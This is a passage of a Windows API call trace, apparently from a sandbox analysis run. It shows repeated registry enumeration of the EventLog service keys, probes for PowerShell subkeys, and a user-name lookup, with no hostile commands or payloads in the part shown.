	[0319.596] CoTaskMemFree (pv=0x0) 
	[0319.596] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.596] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.596] CoTaskMemFree (pv=0xf9420) 
	[0319.596] CoTaskMemFree (pv=0x0) 
	[0319.596] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.596] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.596] CoTaskMemFree (pv=0xf9420) 
	[0319.597] CoTaskMemFree (pv=0x0) 
	[0319.597] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.597] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.597] CoTaskMemFree (pv=0xf9420) 
	[0319.597] CoTaskMemFree (pv=0x0) 
	[0319.597] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x1d0) returned 0x0
	[0319.597] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.597] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x330) returned 0x0
	[0319.597] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.597] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x334) returned 0x0
	[0319.597] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.598] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x338) returned 0x0
	[0319.598] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.598] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x33c) returned 0x0
	[0319.598] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.598] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x340) returned 0x0
	[0319.598] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.598] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x344) returned 0x0
	[0319.598] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.599] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x348) returned 0x0
	[0319.599] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x0) returned 0x2
	[0319.599] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x34c) returned 0x0
	[0319.599] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d138 | out: phkResult=0x28d138*=0x350) returned 0x0
	[0319.599] RegCloseKey (hKey=0x350) returned 0x0
	[0319.599] RegCloseKey (hKey=0x30c) returned 0x0
	[0319.600] RegCloseKey (hKey=0x34c) returned 0x0
	[0319.610] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0319.611] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0320.058] CoTaskMemFree (pv=0x1b81bfd0) 
	[0320.059] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.059] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0320.059] CoTaskMemFree (pv=0xf9420) 
	[0320.943] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d088 | out: phkResult=0x28d088*=0x354) returned 0x0
	[0320.943] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.943] CoTaskMemFree (pv=0x0) 
	[0320.943] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.943] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.943] CoTaskMemFree (pv=0xf9420) 
	[0320.943] CoTaskMemFree (pv=0x0) 
	[0320.943] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.943] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.943] CoTaskMemFree (pv=0xf9420) 
	[0320.943] CoTaskMemFree (pv=0x0) 
	[0320.943] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.943] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.943] CoTaskMemFree (pv=0xf9420) 
	[0320.943] CoTaskMemFree (pv=0x0) 
	[0320.943] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.943] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.944] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.944] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.944] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.944] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.944] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.944] CoTaskMemFree (pv=0xf9420) 
	[0320.944] CoTaskMemFree (pv=0x0) 
	[0320.944] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x358) returned 0x0
	[0320.944] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.945] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x35c) returned 0x0
	[0320.945] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.945] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x360) returned 0x0
	[0320.945] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.945] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x364) returned 0x0
	[0320.945] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.945] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x368) returned 0x0
	[0320.945] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.945] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x36c) returned 0x0
	[0320.946] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.946] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x370) returned 0x0
	[0320.946] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.946] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x374) returned 0x0
	[0320.946] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.946] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x378) returned 0x0
	[0320.946] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x37c) returned 0x0
	[0320.946] RegCloseKey (hKey=0x37c) returned 0x0
	[0320.946] RegCloseKey (hKey=0x354) returned 0x0
	[0320.947] RegCloseKey (hKey=0x378) returned 0x0
	[0320.947] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d088 | out: phkResult=0x28d088*=0x378) returned 0x0
	[0320.947] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.947] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.948] CoTaskMemFree (pv=0xf9420) 
	[0320.948] CoTaskMemFree (pv=0x0) 
	[0320.948] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.948] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.949] CoTaskMemFree (pv=0xf9420) 
	[0320.949] CoTaskMemFree (pv=0x0) 
	[0320.949] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.949] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.949] CoTaskMemFree (pv=0xf9420) 
	[0320.949] CoTaskMemFree (pv=0x0) 
	[0320.949] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.949] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0xf9420, lpcchName=0x28d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.949] CoTaskMemFree (pv=0xf9420) 
	[0320.949] CoTaskMemFree (pv=0x0) 
	[0320.949] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x354) returned 0x0
	[0320.949] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.949] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x37c) returned 0x0
	[0320.949] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.949] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x380) returned 0x0
	[0320.949] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.950] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x384) returned 0x0
	[0320.950] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.950] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x388) returned 0x0
	[0320.950] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.950] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x38c) returned 0x0
	[0320.950] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.950] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x390) returned 0x0
	[0320.950] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.950] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x394) returned 0x0
	[0320.951] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x0) returned 0x2
	[0320.951] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x398) returned 0x0
	[0320.951] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x39c) returned 0x0
	[0320.951] RegCloseKey (hKey=0x39c) returned 0x0
	[0320.951] RegCloseKey (hKey=0x378) returned 0x0
	[0320.951] RegCloseKey (hKey=0x398) returned 0x0
	[0320.952] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d058 | out: phkResult=0x28d058*=0x398) returned 0x0
	[0320.952] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cfcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cfc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cfcc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cfc8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.952] CoTaskMemFree (pv=0x0) 
	[0320.952] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.952] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.952] CoTaskMemFree (pv=0xf9420) 
	[0320.952] CoTaskMemFree (pv=0x0) 
	[0320.952] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.952] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.952] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
